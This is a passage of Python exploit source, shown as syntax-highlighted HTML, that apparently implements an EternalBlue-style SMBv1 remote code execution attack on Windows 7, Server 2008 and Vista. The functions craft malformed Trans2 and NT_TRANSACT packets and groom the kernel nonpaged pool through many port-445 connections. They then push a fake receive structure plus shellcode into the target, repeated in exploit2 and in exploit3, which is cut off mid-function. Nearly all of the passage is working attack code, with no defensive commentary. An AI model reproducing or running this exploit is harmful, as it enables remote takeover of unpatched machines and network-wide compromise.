    <span class="n">recvPkt</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recvSMB</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'got good ECHO response'</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'got bad ECHO response: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">())</span>


<span class="k">def</span> <span class="nf">createSessionAllocNonPaged</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">flags2</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_flags</span><span class="p">()</span>
    <span class="n">flags2</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">FLAGS2_EXTENDED_SECURITY</span>
    <span class="k">if</span> <span class="n">size</span> <span class="o">&gt;=</span> <span class="mi">65535</span><span class="p">:</span>
        <span class="n">flags2</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">FLAGS2_UNICODE</span>
        <span class="n">reqSize</span> <span class="o">=</span> <span class="n">size</span> <span class="o">//</span> <span class="mi">2</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">flags2</span> <span class="o">|=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">FLAGS2_UNICODE</span>
        <span class="n">reqSize</span> <span class="o">=</span> <span class="n">size</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">set_flags</span><span class="p">(</span><span class="n">flags2</span><span class="o">=</span><span class="n">flags2</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">NewSMBPacket</span><span class="p">()</span>
    <span class="n">sessionSetup</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBCommand</span><span class="p">(</span><span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">SMB_COM_SESSION_SETUP_ANDX</span><span class="p">)</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBSessionSetupAndX_Extended_Parameters</span><span class="p">()</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'MaxBufferSize'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">61440</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'MaxMpxCount'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'VcNumber'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'SessionKey'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'SecurityBlobLength'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'Capabilities'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">CAP_EXTENDED_SECURITY</span>
    <span class="n">sessionSetup</span><span class="p">[</span><span class="s">'Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">reqSize</span><span class="p">)</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00</span><span class="s">'</span>
    <span class="n">pkt</span><span class="p">.</span><span class="n">addCommand</span><span class="p">(</span><span class="n">sessionSetup</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">sendSMB</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
    <span class="n">recvPkt</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recvSMB</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'SMB1 session setup allocate nonpaged pool success'</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'SMB1 session setup allocate nonpaged pool failed'</span>
    <span class="k">return</span> <span class="n">conn</span>


<span class="k">class</span> <span class="nc">SMBTransaction2Secondary_Parameters_Fixed</span><span class="p">(</span><span class="n">smb</span><span class="p">.</span><span class="n">SMBCommand_Parameters</span><span class="p">):</span>
    <span class="n">structure</span> <span class="o">=</span> <span class="p">(</span>
     <span class="p">(</span><span class="s">'TotalParameterCount'</span><span class="p">,</span> <span class="s">'&lt;H=0'</span><span class="p">),</span> <span class="p">(</span><span class="s">'TotalDataCount'</span><span class="p">,</span> <span class="s">'&lt;H'</span><span class="p">),</span> <span class="p">(</span><span class="s">'ParameterCount'</span><span class="p">,</span> <span class="s">'&lt;H=0'</span><span class="p">),</span> <span class="p">(</span><span class="s">'ParameterOffset'</span><span class="p">,</span> <span class="s">'&lt;H=0'</span><span class="p">),</span> <span class="p">(</span><span class="s">'ParameterDisplacement'</span><span class="p">,</span> <span class="s">'&lt;H=0'</span><span class="p">),</span> <span class="p">(</span><span class="s">'DataCount'</span><span class="p">,</span> <span class="s">'&lt;H'</span><span class="p">),</span> <span class="p">(</span><span class="s">'DataOffset'</span><span class="p">,</span> <span class="s">'&lt;H'</span><span class="p">),</span> <span class="p">(</span><span class="s">'DataDisplacement'</span><span class="p">,</span> <span class="s">'&lt;H=0'</span><span class="p">),</span> <span class="p">(</span><span class="s">'FID'</span><span class="p">,</span> <span class="s">'&lt;H=0'</span><span class="p">))</span>


<span class="k">def</span> <span class="nf">send_trans2_second</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">displacement</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">NewSMBPacket</span><span class="p">()</span>
    <span class="n">pkt</span><span class="p">[</span><span class="s">'Tid'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tid</span>
    <span class="n">transCommand</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBCommand</span><span class="p">(</span><span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">SMB_COM_TRANSACTION2_SECONDARY</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">]</span> <span class="o">=</span> <span class="n">SMBTransaction2Secondary_Parameters_Fixed</span><span class="p">()</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBTransaction2Secondary_Data</span><span class="p">()</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'TotalParameterCount'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'TotalDataCount'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="n">fixedOffset</span> <span class="o">=</span> <span class="mi">53</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad1'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'ParameterCount'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'ParameterOffset'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">pad2Len</span> <span class="o">=</span> <span class="p">(</span><span class="mi">4</span> <span class="o">-</span> <span class="n">fixedOffset</span> <span class="o">%</span> <span class="mi">4</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span>
        <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad2'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'</span><span class="se">\xff</span><span class="s">'</span> <span class="o">*</span> <span class="n">pad2Len</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad2'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span>
        <span class="n">pad2Len</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'DataCount'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'DataOffset'</span><span class="p">]</span> <span class="o">=</span> <span class="n">fixedOffset</span> <span class="o">+</span> <span class="n">pad2Len</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'DataDisplacement'</span><span class="p">]</span> <span class="o">=</span> <span class="n">displacement</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Trans_Parameters'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Trans_Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">data</span>
    <span class="n">pkt</span><span class="p">.</span><span class="n">addCommand</span><span class="p">(</span><span class="n">transCommand</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">sendSMB</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">send_big_trans2</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">setup</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">param</span><span class="p">,</span> <span class="n">firstDataFragmentSize</span><span class="p">,</span> <span class="n">sendLastChunk</span><span class="o">=</span><span class="bp">True</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">NewSMBPacket</span><span class="p">()</span>
    <span class="n">pkt</span><span class="p">[</span><span class="s">'Tid'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tid</span>
    <span class="n">command</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">setup</span><span class="p">)</span>
    <span class="n">transCommand</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBCommand</span><span class="p">(</span><span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">.</span><span class="n">SMB_COM_NT_TRANSACT</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBNTTransaction_Parameters</span><span class="p">()</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'MaxSetupCount'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'MaxParameterCount'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">param</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'MaxDataCount'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMBTransaction2_Data</span><span class="p">()</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'Setup'</span><span class="p">]</span> <span class="o">=</span> <span class="n">command</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'TotalParameterCount'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">param</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'TotalDataCount'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="n">fixedOffset</span> <span class="o">=</span> <span class="mi">73</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">param</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">padLen</span> <span class="o">=</span> <span class="p">(</span><span class="mi">4</span> <span class="o">-</span> <span class="n">fixedOffset</span> <span class="o">%</span> <span class="mi">4</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span>
        <span class="n">padBytes</span> <span class="o">=</span> <span class="s">'</span><span class="se">\xff</span><span class="s">'</span> <span class="o">*</span> <span class="n">padLen</span>
        <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad1'</span><span class="p">]</span> <span class="o">=</span> <span class="n">padBytes</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad1'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span>
        <span class="n">padLen</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'ParameterCount'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">param</span><span class="p">)</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'ParameterOffset'</span><span class="p">]</span> <span class="o">=</span> <span class="n">fixedOffset</span> <span class="o">+</span> <span class="n">padLen</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">pad2Len</span> <span class="o">=</span> <span class="p">(</span><span class="mi">4</span> <span class="o">-</span> <span class="p">(</span><span class="n">fixedOffset</span> <span class="o">+</span> <span class="n">padLen</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">param</span><span class="p">))</span> <span class="o">%</span> <span class="mi">4</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span>
        <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad2'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'</span><span class="se">\xff</span><span class="s">'</span> <span class="o">*</span> <span class="n">pad2Len</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Pad2'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span>
        <span class="n">pad2Len</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'DataCount'</span><span class="p">]</span> <span class="o">=</span> <span class="n">firstDataFragmentSize</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'DataOffset'</span><span class="p">]</span> <span class="o">=</span> <span class="n">transCommand</span><span class="p">[</span><span class="s">'Parameters'</span><span class="p">][</span><span class="s">'ParameterOffset'</span><span class="p">]</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">param</span><span class="p">)</span> <span class="o">+</span> <span class="n">pad2Len</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Trans_Parameters'</span><span class="p">]</span> <span class="o">=</span> <span class="n">param</span>
    <span class="n">transCommand</span><span class="p">[</span><span class="s">'Data'</span><span class="p">][</span><span class="s">'Trans_Data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="n">firstDataFragmentSize</span><span class="p">]</span>
    <span class="n">pkt</span><span class="p">.</span><span class="n">addCommand</span><span class="p">(</span><span class="n">transCommand</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">sendSMB</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">recvSMB</span><span class="p">()</span>
    <span class="n">i</span> <span class="o">=</span> <span class="n">firstDataFragmentSize</span>
    <span class="k">while</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
        <span class="n">sendSize</span> <span class="o">=</span> <span class="nb">min</span><span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span>
        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">-</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">4096</span><span class="p">:</span>
            <span class="k">if</span> <span class="ow">not</span> <span class="n">sendLastChunk</span><span class="p">:</span>
                <span class="k">break</span>
        <span class="n">send_trans2_second</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">sendSize</span><span class="p">],</span> <span class="n">i</span><span class="p">)</span>
        <span class="n">i</span> <span class="o">+=</span> <span class="n">sendSize</span>

    <span class="k">if</span> <span class="n">sendLastChunk</span><span class="p">:</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">recvSMB</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">i</span>


<span class="k">def</span> <span class="nf">createConnectionWithBigSMBFirst80</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
    <span class="n">sk</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">create_connection</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="mi">445</span><span class="p">))</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="s">'</span><span class="se">\x00\x00</span><span class="s">'</span> <span class="o">+</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&gt;H'</span><span class="p">,</span> <span class="mi">65527</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">+=</span> <span class="s">'BAAD'</span>
    <span class="n">pkt</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">124</span>
    <span class="n">sk</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">sk</span>


<span class="n">lock2</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Lock</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">exploit2</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="n">numGroomConn</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">lock2</span>
    <span class="n">lock2</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">login_standard</span><span class="p">(</span><span class="s">''</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span>
    <span class="n">server_os</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_server_os</span><span class="p">()</span>
    <span class="k">print</span> <span class="s">'Target OS: '</span> <span class="o">+</span> <span class="n">server_os</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="p">(</span><span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 7 '</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server '</span><span class="p">)</span> <span class="ow">and</span> <span class="s">' 2008 '</span> <span class="ow">in</span> <span class="n">server_os</span> <span class="ow">or</span> <span class="n">server_os</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Vista'</span><span class="p">)):</span>
        <span class="k">print</span> <span class="s">'This exploit does not support this target'</span>
    <span class="n">tid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">tree_connect_andx</span><span class="p">(</span><span class="s">'</span><span class="se">\\\\</span><span class="s">'</span> <span class="o">+</span> <span class="n">target</span> <span class="o">+</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span> <span class="o">+</span> <span class="s">'IPC$'</span><span class="p">)</span>
    <span class="n">progress</span> <span class="o">=</span> <span class="n">send_big_trans2</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">feaList</span><span class="p">,</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
    <span class="n">allocConn</span> <span class="o">=</span> <span class="n">createSessionAllocNonPaged</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">NTFEA_SIZE</span> <span class="o">-</span> <span class="mi">4112</span><span class="p">)</span>
    <span class="n">srvnetConn</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">numGroomConn</span><span class="p">):</span>
        <span class="n">sk</span> <span class="o">=</span> <span class="n">createConnectionWithBigSMBFirst80</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
        <span class="n">srvnetConn</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">sk</span><span class="p">)</span>

    <span class="n">holeConn</span> <span class="o">=</span> <span class="n">createSessionAllocNonPaged</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">NTFEA_SIZE</span> <span class="o">-</span> <span class="mi">16</span><span class="p">)</span>
    <span class="n">allocConn</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">):</span>
        <span class="n">sk</span> <span class="o">=</span> <span class="n">createConnectionWithBigSMBFirst80</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
        <span class="n">srvnetConn</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">sk</span><span class="p">)</span>

    <span class="n">holeConn</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="n">send_trans2_second</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">feaList</span><span class="p">[</span><span class="n">progress</span><span class="p">:],</span> <span class="n">progress</span><span class="p">)</span>
    <span class="n">recvPkt</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recvSMB</span><span class="p">()</span>
    <span class="n">retStatus</span> <span class="o">=</span> <span class="n">recvPkt</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">retStatus</span> <span class="o">==</span> <span class="il">3221225485L</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'good response status: INVALID_PARAMETER'</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'bad response status: 0x{:08x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">retStatus</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">sk</span> <span class="ow">in</span> <span class="n">srvnetConn</span><span class="p">:</span>
        <span class="n">sk</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">fake_recv_struct</span> <span class="o">+</span> <span class="n">shellcode</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">sk</span> <span class="ow">in</span> <span class="n">srvnetConn</span><span class="p">:</span>
        <span class="n">sk</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

    <span class="n">conn</span><span class="p">.</span><span class="n">disconnect_tree</span><span class="p">(</span><span class="n">tid</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">logoff</span><span class="p">()</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
    <span class="n">lock2</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="n">lock3</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Lock</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">exploit3</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="n">numGroomConn1</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">lock3</span>
    <span class="n">lock3</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
    <span class="n">conn3</span> <span class="o">=</span> <span class="n">smb</span><span class="p">.</span><span class="n">SMB</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
    <span class="n">conn3</span><span class="p">.</span><span class="n">login_standard</span><span class="p">(</span><span class="s">''</span><span class="p">,</span> <span class="s">''</span><span class="p">)</span>
    <span class="n">server_os3</span> <span class="o">=</span> <span class="n">conn3</span><span class="p">.</span><span class="n">get_server_os</span><span class="p">()</span>
    <span class="k">print</span> <span class="s">'Target OS: '</span> <span class="o">+</span> <span class="n">server_os3</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="p">(</span><span class="n">server_os3</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows 7 '</span><span class="p">)</span> <span class="ow">or</span> <span class="n">server_os3</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Server '</span><span class="p">)</span> <span class="ow">and</span> <span class="s">' 2008 '</span> <span class="ow">in</span> <span class="n">server_os3</span> <span class="ow">or</span> <span class="n">server_os3</span><span class="p">.</span><span class="n">startswith</span><span class="p">(</span><span class="s">'Windows Vista'</span><span class="p">)):</span>
        <span class="k">print</span> <span class="s">'This exploit does not support this target'</span>
    <span class="n">tid3</span> <span class="o">=</span> <span class="n">conn3</span><span class="p">.</span><span class="n">tree_connect_andx</span><span class="p">(</span><span class="s">'</span><span class="se">\\\\</span><span class="s">'</span> <span class="o">+</span> <span class="n">target</span> <span class="o">+</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span> <span class="o">+</span> <span class="s">'IPC$'</span><span class="p">)</span>
    <span class="n">progress3</span> <span class="o">=</span> <span class="n">send_big_trans2</span><span class="p">(</span><span class="n">conn3</span><span class="p">,</span> <span class="n">tid3</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">feaList</span><span class="p">,</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
    <span class="n">allocConn3</span> <span class="o">=</span> <span class="n">createSessionAllocNonPaged</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">NTFEA_SIZE</span> <span class="o">-</span> <span class="mi">4112</span><span class="p">)</span>
    <span class="n">srvnetConn3</span> <span class="o">=</span> <span class="p">[]</span>
